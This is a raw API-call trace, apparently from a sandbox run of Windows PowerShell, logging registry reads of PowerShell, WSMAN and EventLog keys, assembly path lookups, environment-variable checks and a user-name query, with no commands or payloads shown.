	[0671.545] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3ec, lpData=0x0, lpcbData=0x12d3e8*=0x0 | out: lpType=0x12d3ec*=0x1, lpData=0x0, lpcbData=0x12d3e8*=0x56) returned 0x0
	[0671.545] CoTaskMemAlloc (cb=0x5a) returned 0x3188f0
	[0671.546] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d3bc, lpData=0x3188f0, lpcbData=0x12d3b8*=0x56 | out: lpType=0x12d3bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d3b8*=0x56) returned 0x0
	[0671.546] CoTaskMemFree (pv=0x3188f0) 
	[0671.546] RegCloseKey (hKey=0x324) returned 0x0
	[0671.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0671.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0671.547] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0xd3af32d6, Data2=0xef6, Data3=0x4cb9, Data4=([0]=0xa3, [1]=0x57, [2]=0x5d, [3]=0xee, [4]=0xa2, [5]=0x16, [6]=0xf1, [7]=0x9c))) returned 0x0
	[0671.547] CoCreateGuid (in: pguid=0x12d690 | out: pguid=0x12d690*(Data1=0x7b3c2cb9, Data2=0x10a8, Data3=0x426e, Data4=([0]=0xbf, [1]=0x63, [2]=0xf6, [3]=0x32, [4]=0x1f, [5]=0x67, [6]=0xbd, [7]=0x4))) returned 0x0
	[0671.560] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0671.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0671.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0671.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0671.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0671.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0671.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0671.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0671.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0671.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0671.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0671.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0676.250] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0676.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.250] CoTaskMemFree (pv=0x31a0f0) 
	[0676.252] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0676.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.252] CoTaskMemFree (pv=0x31a0f0) 
	[0676.253] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0676.253] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.253] CoTaskMemFree (pv=0x31a0f0) 
	[0676.255] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0676.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.255] CoTaskMemFree (pv=0x31a0f0) 
	[0676.266] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0676.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.266] CoTaskMemFree (pv=0x31a0f0) 
	[0676.271] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0676.271] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.271] CoTaskMemFree (pv=0x31a0f0) 
	[0676.273] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0676.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0676.273] CoTaskMemFree (pv=0x31a0f0) 
	[0676.288] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d678 | out: phkResult=0x12d678*=0x324) returned 0x0
	[0676.289] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d57c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d578, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d57c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d578*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0676.289] CoTaskMemFree (pv=0x0) 
	[0676.292] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0676.293] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x2a4bb0, lpcchValueName=0x12d628, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d628, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0676.293] CoTaskMemFree (pv=0x2a4bb0) 
	[0676.293] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0676.293] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x2a4bb0, lpcchValueName=0x12d628, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d628, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0676.293] CoTaskMemFree (pv=0x2a4bb0) 
	[0676.293] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0676.293] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x2a4bb0, lpcchValueName=0x12d628, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d628, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0676.293] CoTaskMemFree (pv=0x2a4bb0) 
	[0676.294] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d60c, lpData=0x0, lpcbData=0x12d608*=0x0 | out: lpType=0x12d60c*=0x1, lpData=0x0, lpcbData=0x12d608*=0x8) returned 0x0
	[0676.294] CoTaskMemAlloc (cb=0xc) returned 0x31d490
	[0676.294] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d5dc, lpData=0x31d490, lpcbData=0x12d5d8*=0x8 | out: lpType=0x12d5dc*=0x1, lpData="2.0", lpcbData=0x12d5d8*=0x8) returned 0x0
	[0676.294] CoTaskMemFree (pv=0x31d490) 
	[0679.798] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5c8 | out: phkResult=0x12d5c8*=0x324) returned 0x0
	[0679.798] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d4cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d4c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d4cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d4c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0679.798] CoTaskMemFree (pv=0x0) 
	[0679.798] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0679.798] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x2a4bb0, lpcchValueName=0x12d578, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x12d578, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0679.799] CoTaskMemFree (pv=0x2a4bb0) 
	[0679.799] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0679.799] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x2a4bb0, lpcchValueName=0x12d578, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x12d578, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0679.799] CoTaskMemFree (pv=0x2a4bb0) 
	[0679.799] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0679.799] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x2a4bb0, lpcchValueName=0x12d578, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x12d578, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0679.799] CoTaskMemFree (pv=0x2a4bb0) 
	[0679.799] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d55c, lpData=0x0, lpcbData=0x12d558*=0x0 | out: lpType=0x12d55c*=0x1, lpData=0x0, lpcbData=0x12d558*=0x8) returned 0x0
	[0679.799] CoTaskMemAlloc (cb=0xc) returned 0x31d530
	[0679.799] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0x12d52c, lpData=0x31d530, lpcbData=0x12d528*=0x8 | out: lpType=0x12d52c*=0x1, lpData="2.0", lpcbData=0x12d528*=0x8) returned 0x0
	[0679.799] CoTaskMemFree (pv=0x31d530) 
	[0679.801] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0679.801] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0679.801] CoTaskMemFree (pv=0x31a0f0) 
	[0679.806] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0679.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0679.806] CoTaskMemFree (pv=0x31a0f0) 
	[0679.812] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5f8 | out: phkResult=0x12d5f8*=0x2f8) returned 0x0
	[0679.817] RegQueryInfoKeyW (in: hKey=0x2f8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d56c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d568, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d56c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d568*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0679.817] CoTaskMemFree (pv=0x0) 
	[0679.818] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0679.818] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x0, lpName=0x2a4bb0, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0679.818] CoTaskMemFree (pv=0x2a4bb0) 
	[0679.818] CoTaskMemFree (pv=0x0) 
	[0679.818] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0679.818] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x1, lpName=0x2a4bb0, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0679.818] CoTaskMemFree (pv=0x2a4bb0) 
	[0679.818] CoTaskMemFree (pv=0x0) 
	[0679.818] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0679.818] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x2, lpName=0x2a4bb0, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0679.818] CoTaskMemFree (pv=0x2a4bb0) 
	[0679.818] CoTaskMemFree (pv=0x0) 
	[0679.818] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0679.818] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x3, lpName=0x2a4bb0, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0679.818] CoTaskMemFree (pv=0x2a4bb0) 
	[0679.819] CoTaskMemFree (pv=0x0) 
	[0679.819] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0679.819] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x4, lpName=0x2a4bb0, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0679.819] CoTaskMemFree (pv=0x2a4bb0) 
	[0679.819] CoTaskMemFree (pv=0x0) 
	[0679.819] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0679.819] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x5, lpName=0x2a4bb0, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0679.819] CoTaskMemFree (pv=0x2a4bb0) 
	[0679.819] CoTaskMemFree (pv=0x0) 
	[0679.819] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0679.819] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x6, lpName=0x2a4bb0, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0679.819] CoTaskMemFree (pv=0x2a4bb0) 
	[0679.819] CoTaskMemFree (pv=0x0) 
	[0679.819] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0679.819] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x7, lpName=0x2a4bb0, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0679.819] CoTaskMemFree (pv=0x2a4bb0) 
	[0679.819] CoTaskMemFree (pv=0x0) 
	[0679.819] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0679.820] RegEnumKeyExW (in: hKey=0x2f8, dwIndex=0x8, lpName=0x2a4bb0, lpcchName=0x12d5f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x12d5f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0679.820] CoTaskMemFree (pv=0x2a4bb0) 
	[0679.820] CoTaskMemFree (pv=0x0) 
	[0679.820] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x30c) returned 0x0
	[0679.820] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0679.820] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x310) returned 0x0
	[0679.820] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0679.821] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x2fc) returned 0x0
	[0679.821] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0679.821] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x300) returned 0x0
	[0679.821] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0679.821] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x318) returned 0x0
	[0679.821] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0679.821] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x320) returned 0x0
	[0679.821] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0679.821] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x328) returned 0x0
	[0679.822] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0679.822] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x32c) returned 0x0
	[0679.822] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x0) returned 0x2
	[0679.822] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x330) returned 0x0
	[0679.822] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d658 | out: phkResult=0x12d658*=0x334) returned 0x0
	[0679.822] RegCloseKey (hKey=0x334) returned 0x0
	[0679.822] RegCloseKey (hKey=0x2f8) returned 0x0
	[0679.823] RegCloseKey (hKey=0x330) returned 0x0
	[0679.834] CoTaskMemAlloc (cb=0x804) returned 0x1b7cd590
	[0679.835] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7cd590, nSize=0x12d868 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x12d868) returned 0x1
	[0681.413] CoTaskMemFree (pv=0x1b7cd590) 
	[0681.414] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.414] GetUserNameW (in: lpBuffer=0x2a4bb0, pcbBuffer=0x12d8a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x12d8a8) returned 1
	[0681.415] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.431] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d5a8 | out: phkResult=0x12d5a8*=0x338) returned 0x0
	[0681.431] RegQueryInfoKeyW (in: hKey=0x338, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x12d51c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d518, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x12d51c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x12d518*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.431] CoTaskMemFree (pv=0x0) 
	[0681.431] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.431] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x0, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.431] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.431] CoTaskMemFree (pv=0x0) 
	[0681.431] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
	[0681.431] RegEnumKeyExW (in: hKey=0x338, dwIndex=0x1, lpName=0x2a4bb0, lpcchName=0x12d5a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x12d5a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0681.432] CoTaskMemFree (pv=0x2a4bb0) 
	[0681.432] CoTaskMemFree (pv=0x0) 
	[0681.432] CoTaskMemAlloc (cb=0x204) returned 0x2a4bb0
